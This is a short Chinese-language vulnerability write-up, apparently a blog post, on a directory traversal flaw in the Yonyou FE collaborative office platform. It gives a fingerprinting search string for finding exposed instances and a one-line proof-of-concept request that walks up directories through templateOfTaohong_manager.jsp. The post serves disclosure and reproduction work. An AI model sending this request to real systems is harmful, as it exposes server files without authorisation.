Yonyou FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

# Yonyou FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 ## 漏洞描述 Yonyou FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取...

Yonyou FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

漏洞描述

Yonyou FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击

漏洞影响

Yonyou FE协作办公平台

网络测绘

"FE协作"

漏洞复现

登录页面

img

验证POC

/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

img

  • 发表于 2024-07-12 18:45:01
  • 阅读 ( 2266 )
  • 分类:OA产品

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计